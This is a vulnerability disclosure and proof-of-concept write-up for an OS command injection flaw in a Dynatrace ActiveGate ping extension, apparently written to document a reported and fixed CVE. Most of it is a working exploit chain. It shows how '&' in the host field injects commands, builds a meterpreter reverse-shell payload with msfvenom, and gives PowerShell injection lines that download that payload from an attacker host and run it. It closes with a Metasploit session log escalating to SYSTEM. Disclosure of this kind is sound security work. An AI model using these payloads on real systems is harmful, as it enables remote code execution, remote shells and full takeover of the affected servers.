# CVE-2025-61304 "OS command injection vulnerability in Dynatrace ActiveGate ping extension up to 1.016 via crafted ip address" In the background the ping extension is using the command prompt of Windows to perform the ping. The input field for the Test Target Host is also 1024 chars long. After the ip-address you can write additional commands for the ActiveGate to execute, simply by using an '&'. Reported to Dynatrace and fixed with this commit: https://github.com/Dynatrace/dynatrace-api/pull/99 Exploit RCE to add user: add_user Local user list before and after: exploit # Other example payloads: 1. Create a meterpreter reverse shell: ``` msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.51.200 LPORT=4444 -f exe > mshell.exe ``` 2. Download and Execute the shell on the ActiveGate through the Cloud interface using the ping extension: ``` google&powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://192.168.51.200/mshell.exe -OutFile c:\test\mshell.exe google&c:\test\mshell.exe ``` 3. Resulting session ``` msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.51.200:4444 [*] Sending stage (200262 bytes) to 192.168.51.54 [*] Meterpreter session 3 opened (192.168.51.200:4444 -> 192.168.51.54:49800 ) at 2023-01-21 19:02:16 +0100 meterpreter > getuid Server username: NT AUTHORITY\LOCAL SERVICE meterpreter > getsystem ...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : WIN-9493M3CRTDV OS : Windows 2016+ (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x64/windows ```